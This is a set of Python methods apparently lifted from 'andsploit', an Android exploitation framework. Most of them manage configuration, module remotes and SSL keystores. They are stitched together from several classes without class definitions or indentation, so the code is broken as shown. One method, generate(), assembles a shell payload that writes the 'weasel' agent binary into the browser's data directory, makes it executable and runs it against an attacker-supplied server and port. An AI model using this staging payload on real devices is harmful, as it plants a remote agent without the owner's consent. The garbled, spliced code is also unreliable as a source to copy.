def trust(self, certificate, peer):
"""
Add the certificate to the SSL Known Hosts in the Configuration file, so we will
always trust this host in future.
"""
Configuration.set("ssl-known-hosts", "%s|%d" % peer, self.digest(certificate))
def __load_variables(self):
"""
Load extra variables, specified in the .andsploit_config file.
"""
for key in Configuration.get_all_keys("vars"):
self.variables[key] = Configuration.get("vars", key)
def enable(cls, path):
"""
Re-add a andsploit Module Repository to the collection, that was created manually
or has previously been removed with #disable().
"""
if cls.looks_like_repo(path):
Configuration.set('repositories', path, path)
else:
raise UnknownRepository(path)
def disable(cls, path):
"""
Remove a andsploit Module Repository from the collection, but leave the file
system intact.
"""
if cls.is_repo(path):
Configuration.delete('repositories', path)
else:
raise UnknownRepository(path)
def delete(cls, url):
"""
Removes a andsploit remote, with the specified URL.
"""
if cls.get(url) != None:
Configuration.delete('remotes', url)
return True
else:
raise UnknownRemote(url)
def all(cls):
"""
Returns all known andsploit remotes.
If the [remotes] section does not exist in the configuration file, we
create it and add a default repository.
"""
if not Configuration.has_section('remotes'):
cls.create("https://raw.github.com/mwrlabs/andsploit-modules/repository/")
return Configuration.get_all_values('remotes')
def create(cls, url):
"""
Create a new andsploit remote, with the specified URL.
If the URL already exists, no remote will be created.
"""
if cls.get(url) == None:
Configuration.set('remotes', url, url)
return True
else:
return False
def provision(self, path):
"""
Provision new CA Key Material.
This will overwrite any existing CA.
"""
self.authority.create_ca()
Configuration.set("ssl", "ca_path", path)
fs.write(self.ca_certificate_path(), ca.CA.certificate_to_pem(self.authority.ca_cert))
fs.write(self.__ca_key_path(), ca.CA.pkey_to_pem(self.authority.ca_key))
return True
def make_jks_trust_store(self):
"""
Prepare a JKS TrustStore, for the CA.
"""
keytool = Configuration.executable("keytool")
argv = [
keytool,
"-import",
"-trustcacerts",
"-noprompt",
"-alias",
"andsploitCA",
"-file",
self.ca_certificate_path(),
"-keystore",
self.__jks_path("andsploit-ca"),
"-storetype",
"JKS",
"-storepass",
"andsploit",
]
if keytool != None:
if os.spawnve(os.P_WAIT, argv[0], argv, os.environ) == 0:
return self.__bks_path("andsploit-ca")
else:
argv[0] = "keytool"
print "Could not compile the JKS trust store, because keytool could not be located on your system."
print "Run:"
print " ".join(argv)
return False
def loadClass(self, source, klass, relative_to=None):
"""
Load a Class from a local apk file (source) on the running Dalvik VM.
"""
if relative_to == None:
relative_to = os.path.join(os.path.dirname(__file__), "..")
elif relative_to.find(".py") >= 0 or relative_to.find(".pyc") >= 0:
relative_to = os.path.dirname(relative_to)
if not Module.cached_klass(".".join([source, klass])):
loader = utils.ClassLoader(source, self.__get_cache_path(), self.__get_constructor(), self.klass('java.lang.ClassLoader').getSystemClassLoader(), relative_to=relative_to)
loader.android_path = Configuration.library("android.jar")
loader.dx_path = Configuration.executable("dx")
loader.javac_path = Configuration.executable("javac")
Module.cache_klass(".".join([source, klass]), loader.loadClass(klass))
return Module.get_cached_klass(".".join([source, klass]))
def get(cls, url):
"""
Get an instance of Remote, initialised with the remote settings.
"""
url = Configuration.get('remotes', url)
if url != None:
return cls(url)
else:
return None
def ca_path(self, skip_default=False):
"""
Get the path to the CA Key Material, as defined by the configuration file.
"""
ca_path = Configuration.get("ssl", "ca_path")
if ca_path == None and skip_default == False:
ca_path = os.path.join(os.path.dirname(__file__), "embedded_ca")
return ca_path
def generate(self, arguments):
self.format = "R" # we only support RAW format
architecture = "armeabi"
if arguments.working_directory != None:
directory = arguments.working_directory
elif self.__exploit != None:
directory = self.__exploit.working_directory
else:
directory = "/data/data/com.android.browser"
weasel = Configuration.library(os.path.join("weasel", architecture))
self.append(self.hexifyString("cd %s\n" % directory))
self.append(self.hexifyString("/system/bin/rm w\n"))
self.append(self.hexifyString("echo -e \"%s\" > w\n" % "".join(map(lambda b: "\\0%.3o" % ord(b), fs.read(weasel)))))
self.append(self.hexifyString("/system/bin/chmod 770 w\n"))
self.append(self.hexifyString("./w %s %d\n" % arguments.server))
def make_bks_key_store(self, cn, p12_path, export_password, store_password, key_password):
"""
Prepare a BouncyCastle KeyStore from a PKCS12 bundle.
"""
keytool = Configuration.executable("keytool")
argv = [
keytool,
"-importkeystore",
"-deststorepass",
store_password,
"-destkeypass",
key_password,
"-destkeystore",
self.__bks_path(cn),
"-deststoretype",
"BKS",
"-provider",
"org.bouncycastle.jce.provider.BouncyCastleProvider",
"-providerpath",
os.path.abspath(os.path.join(os.path.dirname(__file__), "bcprov-ext-jdk15on-1.46.jar")),
"-srckeystore",
p12_path,
"-srcstoretype",
"PKCS12",
"-srcstorepass",
export_password,
"-alias",
"andsploit",
]
if keytool != None:
if os.spawnve(os.P_WAIT, argv[0], argv, os.environ) == 0:
return self.__bks_path(cn)
else:
argv[0] = "keytool"
print "Could not compile the BKS keystore, because keytool could not be located on your system."
print "Run:"
print " ".join(argv)
return False
def make_bks_trust_store(self):
"""
Prepare a BouncyCastle TrustStore, for the CA.
"""
keytool = Configuration.executable("keytool")
argv = [
keytool,
"-import",
"-trustcacerts",
"-noprompt",
"-alias",
"andsploitCA",
"-file",
self.ca_certificate_path(),
"-keystore",
self.__bks_path("andsploit-ca"),
"-storetype",
"BKS",
"-storepass",
"andsploit",
"-provider",
"org.bouncycastle.jce.provider.BouncyCastleProvider",
"-providerpath",
os.path.abspath(os.path.join(os.path.dirname(__file__), "bcprov-ext-jdk15on-1.46.jar")),
]
if keytool != None:
if os.spawnve(os.P_WAIT, argv[0], argv, os.environ) == 0:
return self.__bks_path("andsploit-ca")
else:
argv[0] = "keytool"
print "Could not compile the BKS trust store, because keytool could not be located on your system."
print "Run:"
print " ".join(argv)
return False
def all(cls):
"""
Returns all known andsploit Repositories.
"""
return Configuration.get_all_values('repositories')
def trusted_certificate_for(self, peer):
"""
Fetches the trusted certificate for a peer.
"""
return Configuration.get("ssl-known-hosts", "%s|%d" % peer)
def unpack(self, name):
if self._execute([self.__java, "-jar", self.__apk_tool, "-q", "decode", Configuration.library(name + ".apk"), self.source_dir()]) != 0:
raise RuntimeError("could not unpack " + name)
